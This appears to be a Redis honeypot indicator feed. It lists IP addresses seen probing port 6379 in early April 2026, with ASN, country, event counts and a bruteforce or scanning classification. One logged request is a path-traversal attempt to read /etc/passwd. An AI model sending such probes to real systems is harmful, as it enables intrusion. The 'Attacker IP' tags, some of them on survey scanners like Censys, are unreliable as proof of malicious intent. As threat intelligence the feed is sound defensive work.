| IPv4 | 223.76.108.98 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 4.194.88.207 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=SG; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 47.250.127.15 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=MY; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 157.230.101.158 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 3.130.168.2 | Attacker IP • Redis / seen in Redishoneypot; events=100; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-04-01 | |
| IPv4 | 47.236.24.189 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 91.231.89.24 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 91.231.89.29 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 91.231.89.53 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 115.190.189.213 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 193.163.125.18 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 185.107.80.93 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=FR; asn=43350; asn_org=NForce Entertainment B.V.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 71.6.232.28 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 157.245.242.235 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 159.89.50.199 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 160.119.76.13 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 167.99.237.167 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 218.59.175.217 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 66.132.195.124 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 20.116.232.29 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 185.61.137.186 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=UA; asn=47674; asn_org=Net Solutions - Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 206.221.176.179 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=23470; asn_org=ReliableSite.Net LLC; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 4.156.218.251 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 64.23.193.149 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 80.82.70.133 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=NL; asn=202425; asn_org=IP Volume inc; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 94.102.49.155 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=NL; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 220.250.52.75 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 120.48.100.73 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 185.156.73.180 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 20.65.194.128 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 47.92.97.77 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 49.7.204.85 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=23724; asn_org=IDC, China Telecommunications Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 8.210.123.17 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 142.93.39.187 | Attacker IP • Redis / seen in Redishoneypot; events=44; ports=6379; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 160.187.107.47 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=ID; asn=153119; asn_org=PT Intan Pariwara; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 183.81.169.235 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=NL; asn=206264; asn_org=Amarutu Technology Ltd; cats=Generic Protocol Command Decode; redis_cmds=GET /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 140.238.153.39 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CA; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 20.233.204.10 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=AE; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 34.230.221.101 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 61.153.23.162 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 114.113.235.163 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 122.8.135.47 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=ZA; asn=136907; asn_org=HUAWEI CLOUDS; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 40.80.204.175 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 120.48.35.163 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-01 | |
| IPv4 | 20.235.199.122 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-01 | |
| IPv4 | 117.72.186.146 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=141679; asn_org=China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 71.6.199.65 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 157.230.241.63 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 198.235.24.75 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 3.16.215.202 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 182.40.103.253 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=136195; asn_org=Qingdao, Shandong Province, P.R.China.; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 143.198.171.196 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 140.82.9.37 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=20473; asn_org=The Constant Company, LLC; redis_cmds=INFO modules; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 39.108.96.168 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 57.152.33.247 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 66.132.172.140 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 66.132.172.16 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 185.242.226.23 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 221.180.47.59 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=56042; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 8.219.222.66 | Attacker IP • Redis / seen in Redishoneypot; events=25; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 80.94.95.221 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=RO; asn=204428; asn_org=SS-Net; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 172.105.186.117 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 184.105.247.247 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 184.105.247.252 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 125.74.55.217 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=141998; asn_org=China Telecom; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 186.3.217.69 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=EC; asn=27947; asn_org=Telconet S.A; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 97.74.92.144 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=26496; asn_org=GoDaddy.com, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 103.221.220.169 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=VN; asn=63760; asn_org=AZDIGI Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 106.13.45.232 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 139.162.47.15 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=SG; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 45.129.98.131 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=UA; asn=201094; asn_org=Mulgin Alexander Sergeevich; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 140.246.124.160 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=58519; asn_org=Cloud Computing Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 150.158.97.56 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-02 | |
| IPv4 | 106.75.241.127 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=17621; asn_org=China Unicom Shanghai network; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 143.110.246.150 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-02 | |
| IPv4 | 115.190.15.61 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 36.139.84.140 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=56046; asn_org=China Mobile communications corporation; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 66.132.186.160 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 66.132.224.16 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 41.89.92.150 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=KE; asn=36914; asn_org=Kenya Education Network; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 192.81.131.109 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 137.184.63.241 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 138.68.58.48 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 160.119.76.200 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 18.218.118.203 | Attacker IP • Redis / seen in Redishoneypot; events=103; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-04-03 | |
| IPv4 | 106.55.63.187 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 183.56.243.176 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=135089; asn_org=China Telecom; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 135.237.126.160 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 61.240.139.28 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 120.48.43.118 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 183.6.4.31 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 16.146.80.64 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 88.202.190.132 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=GB; asn=13213; asn_org=Thg Hosting Limited; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 155.212.189.201 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=198610; asn_org=Beget LLC; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 64.62.197.152 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 64.62.197.154 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 172.234.199.8 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 176.32.193.16 | Attacker IP • Redis / seen in Redishoneypot; events=25; ports=6379; cc=AM; asn=197834; asn_org=Ucom CJSC; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 66.228.40.98 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 122.191.115.237 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 183.56.219.190 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=135089; asn_org=China Telecom; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 61.242.178.28 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 221.236.21.55 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38283; asn_org=CHINANET SiChuan Telecom Internet Data Center; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 106.12.184.7 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 120.71.40.231 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137695; asn_org=CHINATELECOM Xinjiang Wulumuqi MAN network; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 165.227.170.229 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 182.92.181.218 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 47.250.81.7 | Attacker IP • Redis / seen in Redishoneypot; events=25; ports=6379; cc=MY; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 51.77.47.129 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=PL; asn=16276; asn_org=OVH SAS; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 66.132.195.158 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 195.184.76.243 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 195.184.76.247 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-03 | |
| IPv4 | 91.230.168.12 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 114.80.35.241 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-04-03 | |
| IPv4 | 20.169.107.45 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 66.132.186.252 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 66.132.195.35 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 199.45.154.128 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 199.45.154.183 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 199.45.154.32 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 147.185.132.27 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 221.130.29.85 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=56046; asn_org=China Mobile communications corporation; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 113.209.196.69 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 3.132.26.232 | Attacker IP • Redis / seen in Redishoneypot; events=40; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 121.204.160.32 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=133774; asn_org=Fuzhou; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 193.163.125.13 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 3.131.220.121 | Attacker IP • Redis / seen in Redishoneypot; events=100; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L..F.Ad.OL....~.[&.....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-04-04 | |
| IPv4 | 81.29.142.50 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
| IPv4 | 81.29.142.6 | Attacker IP • Redis / seen in Redishoneypot; events=22; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-04 | |
| IPv4 | 101.200.242.201 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-04 | |
